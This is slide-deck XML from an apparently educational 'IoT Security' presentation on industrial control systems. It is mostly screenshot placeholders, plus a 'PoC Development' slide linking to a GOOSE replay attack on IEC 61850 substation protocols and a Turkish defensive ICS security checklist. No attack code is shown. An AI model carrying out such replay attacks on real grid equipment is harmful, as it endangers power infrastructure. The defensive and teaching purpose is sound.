          <p:cNvPr id="337" name="Google Shape;337;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343" name="Google Shape;343;p48" title="Screenshot 2025-05-30 at 10.27.08.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="513457"/>
            <a:ext cx="9144003" cy="4116587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;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id="349" name="Google Shape;349;p49" title="Screenshot 2025-05-30 at 10.30.59.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="305475" y="152400"/>
            <a:ext cx="6828023" cy="2228876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;350;p49" title="Screenshot 2025-05-30 at 10.31.17.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="305475" y="2381276"/>
            <a:ext cx="5654869" cy="2457425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451425" y="152400"/>
            <a:ext cx="5000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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Genel Nesne Yönelimli Trafo Merkezi Olayı</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;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pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Google Shape;357;p50" title="Screenshot 2025-05-30 at 10.31.43.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="48620" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322500" y="160900"/>
            <a:ext cx="6819350" cy="2486150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358" name="Google Shape;358;p50" title="Screenshot 2025-05-30 at 10.32.02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322501" y="2647051"/>
            <a:ext cx="5866650" cy="2100025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;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365" name="Google Shape;365;p51" title="Screenshot 2025-06-01 at 10.42.43.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;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372" name="Google Shape;372;p52" title="Screenshot 2025-05-30 at 09.12.20.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="42804" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1262475"/>
            <a:ext cx="9144000" cy="2278226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;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379" name="Google Shape;379;p53" title="Screenshot 2025-06-01 at 10.42.05.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;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136" name="Google Shape;136;p1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37" name="Google Shape;137;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158950" y="3988725"/>
            <a:ext cx="8520600" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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6000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:schemeClr val="lt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386" name="Google Shape;386;p54" title="Screenshot 2025-06-01 at 10.41.48.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;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5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393" name="Google Shape;393;p55" title="Screenshot 2025-06-01 at 10.41.03.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-58175" y="0"/>
            <a:ext cx="9202174" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="999325"/>
            <a:ext cx="8520600" cy="13422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a:t>PoC Development</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899600" y="3128675"/>
            <a:ext cx="65010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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Steps: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://my.pcloud.com//#page=filemanager&amp;folder=17164076440</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Toolset:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.infotech.pl/products/downloads/trials-for-iec-61850</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3334967" y="2271742"/>
            <a:ext cx="3000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chemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Goose Replay Attack</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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7"/>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407" name="Google Shape;407;p57" title="Screenshot 2025-06-01 at 10.40.20.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="42400"/>
            <a:ext cx="9143998" cy="5101099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;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414" name="Google Shape;414;p58" title="Screenshot 2025-06-01 at 10.40.37.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p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5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421" name="Google Shape;421;p59" title="Screenshot 2025-06-01 at 10.43.50.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;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6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428" name="Google Shape;428;p60" title="Screenshot 2025-06-01 at 10.44.11.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p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6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pic>
        <p:nvPicPr>
          <p:cNvPr id="435" name="Google Shape;435;p61" title="Screenshot 2025-06-01 at 10.44.42.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p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6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442" name="Google Shape;442;p6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443" name="Google Shape;443;p62" title="Screenshot 2025-05-30 at 10.22.24.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4048" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p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6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450" name="Google Shape;450;p6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451" name="Google Shape;451;p63" title="Screenshot 2025-05-30 at 09.25.48.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10096" l="0" r="0" t="8799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p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19" title="ChatGPT Image May 28, 2025 at 11_05_47 PM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="11449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="266350"/>
            <a:ext cx="4991099" cy="4419574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805000" y="1935000"/>
            <a:ext cx="8520600" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="6000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="6000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="6000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p1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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422800" y="2078125"/>
            <a:ext cx="3557100" cy="841200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>ICS Sistemler için Kontrol Listesi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="458" name="Google Shape;458;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="46908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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138700" y="286700"/>
            <a:ext cx="10126200" cy="4953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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1. Ağ Mimarisi ve Segmentasyon</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IT (bilgi teknolojileri) ve OT (operasyonel teknolojiler) ağları birbirinden ayrılmış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DMZ (Demilitarized Zone) doğru şekilde yapılandırılmış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SCADA ağı internete doğrudan bağlı mı? (→ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Olmamalı</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</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Endüstriyel protokoller (Modbus, DNP3, GOOSE, Profinet, vs.) sadece OT içinde mi çalışıyor?</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VLAN segmentasyonu uygulanmış mı?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2. Erişim Kontrolleri</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Kullanıcı hesapları minimum ayrıcalık prensibiyle yapılandırılmış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Her cihaz ve SCADA terminali benzersiz kullanıcılarla mı çalışıyor?</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Kimlik doğrulama mekanizmaları (örneğin MFA) aktif mi?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Eski/kullanılmayan kullanıcı hesapları sistemden kaldırılmış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Uzaktan erişim sadece güvenli yollarla mı sağlanıyor (VPN, bastion host vs.)?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>3. Yama ve Güncelleme Yönetimi</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Sistemlerde kullanılan tüm yazılımların güncel bir envanteri mevcut mu?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Kritik sistemlerde güncelleme prosedürü (test → uygulama) belirlenmiş mi?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İşletim sistemleri ve kontrol yazılımları (HMI, PLC yazılımları vs.) güncel mi?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Hatalı/bozuk yazılım versiyonları geri alınabiliyor mu (rollback planı)?</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120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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;p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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138700" y="286700"/>
            <a:ext cx="10126200" cy="4021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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>4. Güvenlik Duvarları ve İzleme</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SCADA/PLC ağ geçitlerinde güvenlik duvarları konumlandırılmış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Sadece izinli port ve protokoller açık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Anomali tabanlı IDS/IPS sistemleri (örn. Snort, Suricata, Zeek) aktif mi?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OT ağındaki tüm trafiği analiz eden bir izleme aracı mevcut mu? (örn. Wireshark, Arkime, Nozomi, Dragos)</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
